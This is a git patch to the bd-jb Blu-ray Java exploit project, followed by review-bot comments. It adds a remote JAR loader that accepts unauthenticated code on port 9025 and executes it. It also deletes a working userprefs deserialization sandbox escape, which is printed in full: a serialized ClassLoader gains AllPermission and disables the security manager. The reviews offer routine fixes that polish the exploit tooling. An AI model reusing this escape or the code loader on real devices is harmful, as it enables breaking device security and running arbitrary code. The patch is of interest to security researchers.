From 44713ef59f897ff2125efccbdcb5d07dbe1ffdb5 Mon Sep 17 00:00:00 2001
From: Andy Nguyen
Date: Thu, 28 Nov 2024 19:02:08 +0100
Subject: [PATCH] Add remote JAR loader and remove userprefs exploit.

---
 Makefile | 39 ++++++----
 bdmv/bdjo.xml | 2 +-
 src/com/bdjb/Exploit.java | 45 ++----------
 src/com/bdjb/Loader.java | 73 +++++++++++++++++++
 .../{ExploitXlet.java => LoaderXlet.java} | 6 +-
 src/com/bdjb/Screen.java | 19 ++++-
 ...xploitXlet.perm => bluray.LoaderXlet.perm} | 0
 .../exploit/sandbox/ExploitUserPrefsImpl.java | 61 ----------------
 .../exploit/sandbox/PayloadClassLoader.java | 57 --------------
 .../sandbox/PayloadClassLoaderSerializer.java | 25 -------
 10 files changed, 121 insertions(+), 206 deletions(-)
 create mode 100644 src/com/bdjb/Loader.java
 rename src/com/bdjb/{ExploitXlet.java => LoaderXlet.java} (91%)
 rename src/com/bdjb/{bluray.ExploitXlet.perm => bluray.LoaderXlet.perm} (100%)
 delete mode 100644 src/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java
 delete mode 100644 src/com/bdjb/exploit/sandbox/PayloadClassLoader.java
 delete mode 100644 src/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java

diff --git a/Makefile b/Makefile
index a888512..db5e02f 100644
--- a/Makefile
+++ b/Makefile
@@ -5,8 +5,12 @@ LIB = lib
 SRC = src
 TOOLS = tools
 
-CLASSES = \
-	$(SRC)/com/bdjb/ExploitXlet.java \
+LOADER_CLASSES = \
+	$(SRC)/com/bdjb/LoaderXlet.java \
+	$(SRC)/com/bdjb/Loader.java \
+	$(SRC)/com/bdjb/Screen.java \
+
+EXPLOIT_CLASSES = \
 	$(SRC)/com/bdjb/Exploit.java \
 	$(SRC)/com/bdjb/Screen.java \
 	$(SRC)/com/bdjb/api/API.java \
@@ -25,39 +29,42 @@ CLASSES = \
 	$(SRC)/com/bdjb/jit/JitCompilerReceiverImpl.java \
 	$(SRC)/com/bdjb/exploit/sandbox/ExploitSandboxInterface.java \
 	$(SRC)/com/bdjb/exploit/sandbox/ExploitDefaultImpl.java \
-	$(SRC)/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java \
 	$(SRC)/com/bdjb/exploit/sandbox/ExploitServiceProxyImpl.java \
 	$(SRC)/com/bdjb/exploit/sandbox/IxcProxyImpl.java \
 	$(SRC)/com/bdjb/exploit/sandbox/ServiceInterface.java \
 	$(SRC)/com/bdjb/exploit/sandbox/ServiceImpl.java \
 	$(SRC)/com/bdjb/exploit/sandbox/ProviderAccessorImpl.java \
-	$(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoader.java \
 	$(SRC)/com/bdjb/exploit/sandbox/Payload.java \
 	$(SRC)/com/bdjb/exploit/kernel/ExploitKernelInterface.java \
 
 JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar"
 
-all: directory serialized classes jar bdjo_bdmv
+all: loader exploit
 
-directory:
+loader: build_directory loader_classes loader_jar loader_bdjo_bdmv
+
+exploit: build_directory exploit_classes exploit_jar
+
+build_directory:
 	mkdir -p $(BUILD)
 
-serialized:
-	javac -d $(BUILD) -sourcepath $(SRC) $(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java
-	java -cp $(BUILD) com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoader.ser
-	rm $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.class
+loader_classes:
+	javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(LOADER_CLASSES)
 
-classes:
-	javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(CLASSES)
+exploit_classes:
+	javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(EXPLOIT_CLASSES)
 
-jar:
-	rm -rf $(BUILD)/jdk
+loader_jar:
 	mkdir -p $(DISC)/BDMV/JAR
-	cp $(SRC)/com/bdjb/bluray.ExploitXlet.perm $(BUILD)/com/bdjb/bluray.ExploitXlet.perm
+	cp $(SRC)/com/bdjb/bluray.LoaderXlet.perm $(BUILD)/com/bdjb/bluray.LoaderXlet.perm
 	cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd ..
 	java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar
 
-bdjo_bdmv:
+exploit_jar:
+	rm -rf $(BUILD)/jdk
+	cd $(BUILD) && jar cf 00000.jar . && cd ..
+
+loader_bdjo_bdmv:
 	mkdir -p $(DISC)/BDMV/BDJO
 	java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo
 	java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv
diff --git a/bdmv/bdjo.xml b/bdmv/bdjo.xml
index da6cc69..21e4266 100644
--- a/bdmv/bdjo.xml
+++ b/bdmv/bdjo.xml
@@ -15,7 +15,7 @@ 0x0 - com.bdjb.ExploitXlet + com.bdjb.LoaderXlet 128 1
diff --git a/src/com/bdjb/Exploit.java b/src/com/bdjb/Exploit.java
index cedef3c..e7bc494 100644
--- a/src/com/bdjb/Exploit.java
+++ b/src/com/bdjb/Exploit.java
@@ -9,26 +9,16 @@ package com.bdjb;
 
 import com.bdjb.exploit.kernel.ExploitKernelInterface;
 import com.bdjb.exploit.sandbox.ExploitDefaultImpl;
-import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl;
 import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
 import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl;
-import java.io.FileOutputStream;
-import java.io.InputStream;
-import java.io.OutputStream;
-import java.net.InetAddress;
-import java.net.ServerSocket;
-import java.net.Socket;
-
-class Exploit implements Runnable {
-  static void init() {
-    Screen.println("[+] bd-jb by theflow");
+import java.lang.reflect.Method;
+public class Exploit {
+  public static void main(Method screenPrintln) {
+    Screen.setRemotePrintln(screenPrintln);
 
     Screen.println("[*] Escaping Java Sandbox...");
 
-    Class[] sandboxExploits =
-        new Class[] {
-          ExploitDefaultImpl.class, ExploitUserPrefsImpl.class, ExploitServiceProxyImpl.class
-        };
+    Class[] sandboxExploits = new Class[] {ExploitDefaultImpl.class, ExploitServiceProxyImpl.class};
 
     for (int i = 0; i < sandboxExploits.length; i++) {
       try {
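Review bot: The new `exploit_jar` recipe at the end of this hunk runs `cd $(BUILD) && jar cf 00000.jar .`, which writes the archive into the very tree it is packing, so a second `make exploit` bundles the previous 00000.jar inside the new one; emitting it outside that tree, `cd $(BUILD) && jar cf ../00000.jar . && cd ..`, avoids it. Because `loader` and `exploit` both compile into `$(BUILD)` and `all: loader exploit` runs them back to back, the exploit jar also carries LoaderXlet, Loader and the bluray.LoaderXlet.perm copied there by `loader_jar`; separate output directories, or a clean step between the two, would keep the jars independent. The `rm -rf $(BUILD)/jdk` line was carried over from the old `jar` target with nothing saying what creates that directory; a one-line comment naming its producer would help the next reader.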
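Review bot: The context line `import com.bdjb.exploit.kernel.ExploitKernelInterface;` at the top of this hunk is left unused, since its only consumer, `run()`, is deleted in the next hunk, and javac's `-Xlint:all` does not report unused imports; drop it together with the other removed imports. The new `main(Method screenPrintln)` is not a JVM entry point but a reflective one (Loader looks it up by name with a single `Method` parameter), so a Javadoc would stop the signature from being "fixed" later, for example `/** Entry point called by the loader via reflection; screenPrintln is the loader Screen's static println(String), installed through Screen.setRemotePrintln so output reaches the visible screen. */`. The added `+import java.lang.reflect.Method;` appears to run straight into `+public class Exploit {` with no blank line between them, unlike the rest of the file. The body of `main` continues past the end of the hunk.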
@@ -46,29 +36,4 @@ class Exploit implements Runnable {
       Screen.println("[-] Error could not disable security manager.");
     }
   }
-
-  static void start() {
-    new Thread(new Exploit()).start();
-  }
-
-  public void run() {
-    if (System.getSecurityManager() != null) {
-      return;
-    }
-
-    Screen.println("[*] Exploiting kernel...");
-
-    Class[] kernelExploits = new Class[] {};
-
-    for (int i = 0; i < kernelExploits.length; i++) {
-      try {
-        ExploitKernelInterface exploit = (ExploitKernelInterface) kernelExploits[i].newInstance();
-        if (exploit.trigger()) {
-          break;
-        }
-      } catch (Exception e) {
-        continue;
-      }
-    }
-  }
 }
diff --git a/src/com/bdjb/Loader.java b/src/com/bdjb/Loader.java
new file mode 100644
index 0000000..6a83944
--- /dev/null
+++ b/src/com/bdjb/Loader.java
@@ -0,0 +1,73 @@
+/*
+ * Copyright (C) 2021 Andy Nguyen
+ *
+ * This software may be modified and distributed under the terms
+ * of the MIT license. See the LICENSE file for details.
+ */
+
+package com.bdjb;
+
+import java.io.FileOutputStream;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.net.ServerSocket;
+import java.net.Socket;
+import java.net.URL;
+import java.lang.reflect.Method;
+import org.dvb.lang.DVBClassLoader;
+
+class Loader implements Runnable {
+  private static final String MNT_ADA_JAR_FILE = "/OS/HDD/download0/mnt_ada/00000.jar";
+
+  private static final String EXPLOIT_CLASS_NAME = "com.bdjb.Exploit";
+  private static final String MAIN_METHOD_NAME = "main";
+  private static final String PRINTLN_METHOD_NAME = "println";
+
+  static void startJarLoader() {
+    new Thread(new Loader()).start();
+  }
+
+  public void run() {
+    Screen.println("[+] bd-jb by theflow");
+
+    while (true) {
+      Screen.println("[*] Listening for remote JAR on port 9025...");
+
+      try {
+        ServerSocket serverSocket = new ServerSocket(9025);
+        Socket socket = serverSocket.accept();
+        InputStream inputStream = socket.getInputStream();
+        OutputStream outputStream = new FileOutputStream(MNT_ADA_JAR_FILE);
+
+        byte[] buf = new byte[8192];
+        int total = 0;
+        int read;
+        while ((read = inputStream.read(buf)) > 0) {
+          outputStream.write(buf, 0, read);
+          total += read;
+        }
+
+        outputStream.close();
+        inputStream.close();
+
+        serverSocket.close();
+
+        Screen.println("[+] Received " + total + " bytes");
+
+        Screen.println("[+] Launching JAR...");
+
+        DVBClassLoader dvbClassLoader =
+            DVBClassLoader.newInstance(new URL[] {new URL("file://" + MNT_ADA_JAR_FILE)});
+        Class exploitClass = dvbClassLoader.loadClass(EXPLOIT_CLASS_NAME);
+        Method main = exploitClass.getMethod(MAIN_METHOD_NAME, new Class[] {Method.class});
+        Method screenPrintln =
+            Screen.class.getMethod(PRINTLN_METHOD_NAME, new Class[] {String.class});
+        main.invoke(null, new Object[] {screenPrintln});
+
        Screen.println("[+] JAR exited");
+      } catch (Exception e) {
+        Screen.println("[-] Error: " + e.getMessage());
+      }
+    }
+  }
+}
diff --git a/src/com/bdjb/ExploitXlet.java b/src/com/bdjb/LoaderXlet.java
similarity index 91%
rename from src/com/bdjb/ExploitXlet.java
rename to src/com/bdjb/LoaderXlet.java
index 92bd947..9299dc5 100644
--- a/src/com/bdjb/ExploitXlet.java
+++ b/src/com/bdjb/LoaderXlet.java
@@ -13,13 +13,11 @@ import javax.tv.xlet.XletContext;
 import org.havi.ui.HScene;
 import org.havi.ui.HSceneFactory;
 
-public class ExploitXlet implements Xlet {
+public class LoaderXlet implements Xlet {
   private HScene scene;
   private Screen screen;
 
   public void initXlet(XletContext context) {
-    Exploit.init();
-
     screen = Screen.getInstance();
     screen.setSize(1920, 1080); // BD screen size
 
@@ -31,7 +29,7 @@ public class ExploitXlet implements Xlet {
   public void startXlet() {
     screen.setVisible(true);
     scene.setVisible(true);
-    Exploit.start();
+    Loader.startJarLoader();
   }
 
   public void pauseXlet() {
diff --git a/src/com/bdjb/Screen.java b/src/com/bdjb/Screen.java
index c3443ad..b3e0c96 100644
--- a/src/com/bdjb/Screen.java
+++ b/src/com/bdjb/Screen.java
@@ -11,6 +11,7 @@ import java.awt.Color;
 import java.awt.Container;
 import java.awt.Font;
 import java.awt.Graphics;
+import java.lang.reflect.Method;
 import java.util.ArrayList;
 
 public class Screen extends Container {
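Review bot: In `run()` the `ServerSocket`, `Socket` and both streams are closed only on the success path; if `accept()`, the copy loop or the `FileOutputStream` constructor throws they leak, and because the `while (true)` loop immediately calls `new ServerSocket(9025)` again, the next iteration fails to bind and the loop spins printing `[-] Error:` (the `Socket` itself is never closed even on success). The catch prints `e.getMessage()`, which for the `InvocationTargetException` that `main.invoke` throws when the loaded JAR fails is null, so those failures show as `[-] Error: null`; report `getTargetException()` instead (needs `import java.lang.reflect.InvocationTargetException;`). Nothing inspects what arrived before `DVBClassLoader` defines and runs it, so whichever host reaches port 9025 first decides what executes; if that is the intended workflow, a comment on `run()` stating that trust assumption keeps it from being overlooked. The Makefile's `-source 1.4` rules out try-with-resources and `Closeable`, hence the explicit guarded closes below.
```java
  public void run() {
    Screen.println("[+] bd-jb by theflow");

    while (true) {
      Screen.println("[*] Listening for remote JAR on port 9025...");

      ServerSocket serverSocket = null;
      Socket socket = null;
      InputStream inputStream = null;
      OutputStream outputStream = null;
      try {
        serverSocket = new ServerSocket(9025);
        socket = serverSocket.accept();
        inputStream = socket.getInputStream();
        outputStream = new FileOutputStream(MNT_ADA_JAR_FILE);

        // … unchanged: copy loop and "Received" message …

        outputStream.close();
        inputStream.close();
        socket.close();
        serverSocket.close();

        // … unchanged: "Launching JAR", DVBClassLoader.newInstance, getMethod, main.invoke, "JAR exited" …
      } catch (InvocationTargetException e) {
        // main.invoke wraps the JAR's own exception; the wrapper's getMessage() is null, so report the cause.
        Screen.println("[-] Error: " + e.getTargetException());
      } catch (Exception e) {
        Screen.println("[-] Error: " + e.getMessage());
      } finally {
        // Release anything a failure left open, or the next iteration cannot rebind port 9025.
        if (outputStream != null) { try { outputStream.close(); } catch (Exception ignored) { } }
        if (inputStream != null) { try { inputStream.close(); } catch (Exception ignored) { } }
        if (socket != null) { try { socket.close(); } catch (Exception ignored) { } }
        if (serverSocket != null) { try { serverSocket.close(); } catch (Exception ignored) { } }
      }
    }
  }
```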
@@ -22,13 +23,27 @@ public class Screen extends Container {
 
   private static final Screen instance = new Screen();
 
+  private static Method remoteScreenPrintln = null;
+
   public static Screen getInstance() {
     return instance;
   }
 
+  public static void setRemotePrintln(Method screenPrintln) {
+    remoteScreenPrintln = screenPrintln;
+  }
+
   public static void println(String msg) {
-    messages.add(msg);
-    instance.repaint();
+    if (remoteScreenPrintln != null) {
+      try {
+        remoteScreenPrintln.invoke(null, new Object[] {msg});
+      } catch (Exception e) {
+        // Ignore.
+      }
+    } else {
+      messages.add(msg);
+      instance.repaint();
+    }
   }
 
   public void paint(Graphics g) {
diff --git a/src/com/bdjb/bluray.ExploitXlet.perm b/src/com/bdjb/bluray.LoaderXlet.perm
similarity index 100%
rename from src/com/bdjb/bluray.ExploitXlet.perm
rename to src/com/bdjb/bluray.LoaderXlet.perm
diff --git a/src/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java b/src/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java
deleted file mode 100644
index 3d1979e..0000000
--- a/src/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java
+++ /dev/null
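Review bot: The `catch (Exception e) { // Ignore. }` in the new `println` discards the message whenever the reflective call fails (a non-static method handed in so `invoke(null, …)` throws, or an exception inside the remote println), so a broken hook silences all output with no trace; falling back to the local path in the catch, `messages.add(msg); instance.repaint();`, at least keeps the text in the buffer, though whether that local instance is visible in the remote case cannot be told from here. `setRemotePrintln` and the new field carry no documentation; Loader hands in its own `Screen.println` and Exploit installs it, so a Javadoc such as `/** Redirects println to another Screen class's static println(String), as set up by the loader; null restores local rendering. */` on the setter states the contract, including that the target must be static. `remoteScreenPrintln` is plain static state written by whoever calls the setter and read by whichever thread calls `println`; if those can be different threads, marking it `volatile` is the cheap way to make the handoff visible.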
@@ -1,61 +0,0 @@
-/*
- * Copyright (C) 2021 Andy Nguyen
- *
- * This software may be modified and distributed under the terms
- * of the MIT license. See the LICENSE file for details.
- */
-
-package com.bdjb.exploit.sandbox;
-
-import java.io.FileOutputStream;
-import java.io.InputStream;
-import java.io.ObjectOutputStream;
-import java.io.OutputStream;
-import org.havi.ui.HSceneFactory;
-
-/** Implementation of the userprefs deserialization exploit. */
-public class ExploitUserPrefsImpl implements ExploitSandboxInterface {
-  private static final String USERPREFS_FILE = "/OS/HDD/download0/mnt_ada/userprefs";
-
-  private static final String PAYLOAD_CLASS_LOADER_SER_FILE =
-      "/com/bdjb/exploit/sandbox/PayloadClassLoader.ser";
-
-  public boolean trigger() throws Exception {
-    try {
-      // Overwrite userprefs with a serialized PayloadClassLoader.
-      InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER_FILE);
-      OutputStream outputStream = new FileOutputStream(USERPREFS_FILE);
-
-      byte[] buf = new byte[8192];
-      int read;
-      while ((read = inputStream.read(buf)) > 0) {
-        outputStream.write(buf, 0, read);
-      }
-
-      outputStream.close();
-      inputStream.close();
-
-      // Trigger deserialization vulnerability.
-      try {
-        HSceneFactory.getInstance().getDefaultHScene();
-      } catch (ClassCastException e) {
-        // Exception expected.
-
-        // Instantiate the payload class.
-        PayloadClassLoader.getInstance().newPayload();
-
-        return System.getSecurityManager() == null;
-      }
-    } finally {
-      // Restore userprefs file.
-      String[][] preferences = new String[9][];
-      preferences[3] = new String[] {"26"};
-      ObjectOutputStream outputStream =
-          new ObjectOutputStream(new FileOutputStream(USERPREFS_FILE));
-      outputStream.writeObject(preferences);
-      outputStream.close();
-    }
-
-    return false;
-  }
-}
diff --git a/src/com/bdjb/exploit/sandbox/PayloadClassLoader.java b/src/com/bdjb/exploit/sandbox/PayloadClassLoader.java
deleted file mode 100644
index cae2277..0000000
--- a/src/com/bdjb/exploit/sandbox/PayloadClassLoader.java
+++ /dev/null
@@ -1,57 +0,0 @@
-/*
- * Copyright (C) 2021 Andy Nguyen
- *
- * This software may be modified and distributed under the terms
- * of the MIT license. See the LICENSE file for details.
- */
-
-package com.bdjb.exploit.sandbox;
-
-import java.io.ByteArrayOutputStream;
-import java.io.InputStream;
-import java.io.ObjectInputStream;
-import java.io.Serializable;
-import java.security.AllPermission;
-import java.security.Permissions;
-import java.security.ProtectionDomain;
-
-/** ClassLoader subclass that is instantiated on deserialization. */
-class PayloadClassLoader extends ClassLoader implements Serializable {
-  private static final long serialVersionUID = 0x4141414141414141L;
-
-  private static final String PAYLOAD_CLASS_FILE = "/com/bdjb/exploit/sandbox/Payload.class";
-  private static final String PAYLOAD_CLASS_NAME = "com.bdjb.exploit.sandbox.Payload";
-
-  private static PayloadClassLoader instance;
-
-  static PayloadClassLoader getInstance() {
-    return instance;
-  }
-
-  private void readObject(ObjectInputStream stream) {
-    instance = this;
-  }
-
-  void newPayload() throws Exception {
-    InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_FILE);
-    ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
-
-    byte[] buf = new byte[8192];
-    int read;
-    while ((read = inputStream.read(buf)) > 0) {
-      outputStream.write(buf, 0, read);
-    }
-
-    inputStream.close();
-
-    byte[] payload = outputStream.toByteArray();
-
-    // Instantiate the payload class with all permissions to disable the security manager.
-    Permissions permissions = new Permissions();
-    permissions.add(new AllPermission());
-    ProtectionDomain protectionDomain = new ProtectionDomain(null, permissions);
-    Class payloadClass =
-        defineClass(PAYLOAD_CLASS_NAME, payload, 0, payload.length, protectionDomain);
-    payloadClass.newInstance();
-  }
-}
diff --git a/src/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java b/src/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java
deleted file mode 100644
index c985ae2..0000000
--- a/src/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java
+++ /dev/null
@@ -1,25 +0,0 @@
-/*
- * Copyright (C) 2021 Andy Nguyen
- *
- * This software may be modified and distributed under the terms
- * of the MIT license. See the LICENSE file for details.
- */
-
-package com.bdjb.exploit.sandbox;
-
-import com.bdjb.exploit.sandbox.PayloadClassLoader;
-import java.io.FileOutputStream;
-import java.io.ObjectOutputStream;
-
-/** Simple util to create a serialized object of the PayloadClassLoader class. */
-class PayloadClassLoaderSerializer {
-  public static void main(String[] args) {
-    try {
-      ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream(args[0]));
-      objectOutputStream.writeObject(new PayloadClassLoader());
-      objectOutputStream.close();
-    } catch (Exception e) {
-      e.printStackTrace();
-    }
-  }
-}